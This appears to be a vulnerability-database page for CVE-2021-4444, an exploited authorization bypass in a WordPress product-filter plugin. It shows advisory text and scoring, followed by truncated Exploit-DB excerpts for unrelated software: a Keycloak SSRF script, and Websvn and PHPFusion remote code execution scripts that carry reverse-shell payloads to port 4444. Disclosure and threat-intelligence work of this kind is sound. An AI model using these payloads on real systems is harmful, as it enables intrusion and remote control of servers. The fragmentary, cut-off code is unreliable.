CVE-2021-4444
published 2024-10-16CVE-2021-4444: The Product Filter by WooBeWoo plugin for WordPress is vulnerable to authorization bypass in versions up to, and including 1.4.9 due to missing authorization…
PriorityP276high7.3CVSS 3.1
AVNACLPRNUINSUCLILAL
ITWVulnCheck KEV
Exploited in the wild
EPSS
0.32%
23.8th percentile
The Product Filter by WooBeWoo plugin for WordPress is vulnerable to authorization bypass in versions up to, and including 1.4.9 due to missing authorization checks on various functions. This makes it possible for unauthenticated attackers to perform unauthorized actions such as creating new filters and injecting malicious javascript into a vulnerable site. This was actively exploited at the time of discovery.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| woobewoo | product_filter_for_woocommerce_by_wbw | <= 1.4.9 | — |
CVSS provenance
nvdv3.17.3HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
vulncheck7.3HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2484-xfxv-q77x: The Product Filter by WooBeWoo plugin for WordPress is vulnerable to authorization bypass in versions up to, and including 1
ghsa_unreviewed·2024-10-16
CVE-2021-4444 [HIGH] CWE-862 GHSA-2484-xfxv-q77x: The Product Filter by WooBeWoo plugin for WordPress is vulnerable to authorization bypass in versions up to, and including 1
The Product Filter by WooBeWoo plugin for WordPress is vulnerable to authorization bypass in versions up to, and including 1.4.9 due to missing authorization checks on various functions. This makes it possible for unauthenticated attackers to perform unauthorized actions such as creating new filters and injecting malicious javascript into a vulnerable site. This was actively exploited at the time of discovery.
VulnCheck
Product Filter by WooBeWoo plugin for WordPress Javascript Injection Vulnerability
vulncheck·2021·CVSS 7.3
CVE-2021-4444 [HIGH] Product Filter by WooBeWoo plugin for WordPress Javascript Injection Vulnerability
Product Filter by WooBeWoo plugin for WordPress Javascript Injection Vulnerability
The Product Filter by WooBeWoo plugin for WordPress is vulnerable to authorization bypass in versions up to, and including 1.4.9 due to missing authorization checks on various functions. This makes it possible for unauthenticated attackers to perform unauthorized actions such as creating new filters and injecting malicious javascript into a vulnerable site. This was actively exploited at the time of discovery.
Affected: WBW Product Filter by WooBeWoo plugin for WordPress
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/threat-intel/vulnerabilities/w
No detection rules found.
Exploit-DB
Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
exploitdb·2021-10-13·CVSS 5.3
CVE-2020-10770 [MEDIUM] Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
---
# Exploit Title: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
# Date: 2021-10-09
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.keycloak.org/
# Software Link: https://www.keycloak.org/archive/downloads-12.0.1.html
# Version: versions 192.168.0.1:4444
'''))
parser.add_argument("-u","--url", help="Keycloak Target URL (Example: http://127.0.0.1:8080)")
args = parser.parse_args()
if len(sys.argv) ")
_req = r.get(f'{Host}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{hook}', headers = headerscontent)
return
Exploit-DB
Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
exploitdb·2021-06-21·CVSS 9.8
CVE-2021-32305 [CRITICAL] Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
---
# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
# Date: 20/06/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://websvnphp.github.io/
# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0
# Version: 2.6.0
# Tested on: Docker + Debian GNU/Linux (Buster)
# CVE : CVE-2021-32305
import requests
import argparse
from urllib.parse import quote_plus
PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'
parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")
args = parser.parse_args()
if args.target.startswith("http://") or args.ta
Exploit-DB
PHPFusion 9.03.50 - Remote Code Execution
exploitdb·2021-05-28·CVSS 8.8
CVE-2020-24949 [HIGH] PHPFusion 9.03.50 - Remote Code Execution
PHPFusion 9.03.50 - Remote Code Execution
---
# Exploit Title: PHPFusion 9.03.50 - Remote Code Execution
# Date: 20/05/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://www.php-fusion.co.uk/home.php
# Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30&download_id=606
# Version: 9.03.50
# Tested on: Docker + Debian GNU/Linux 8 (jessie)
# CVE : CVE-2020-24949
# Found by: ThienNV
import requests
import base64
import argparse
PAYLOAD = "php -r '$sock=fsockopen(\"127.0.0.1\",4444);exec(\"/bin/sh -i &4 2>&4\");' " # !!spaces are important in order to avoid ==!!
REQUEST_PAYLOAD = "/infusions/downloads/downloads.php?cat_id=$\{{system(base64_decode({})).exit\}}"
parser = argparse.ArgumentParser(description='Send a payload to a Fusion 9.03.50 serv
Exploit-DB
Quick.CMS 6.7 - Remote Code Execution (Authenticated)
exploitdb·2021-01-29·CVSS 7.2
CVE-2020-35754 [HIGH] Quick.CMS 6.7 - Remote Code Execution (Authenticated)
Quick.CMS 6.7 - Remote Code Execution (Authenticated)
---
# Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated)
# Date: 2020-12-28
# Exploit Author: mari0x00
# Vendor Homepage: https://opensolution.org/
# Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip
# Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/
# Version: ","red")))
print((colored("[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ [email protected] pass123 192.168.101.101 4444","red")))
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
IP = sys.argv[4]
PORT = sys.argv[5]
#Start session
s = requests.Session()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/
No writeups or analysis indexed.
2024-10-16
Published
Exploited in the wild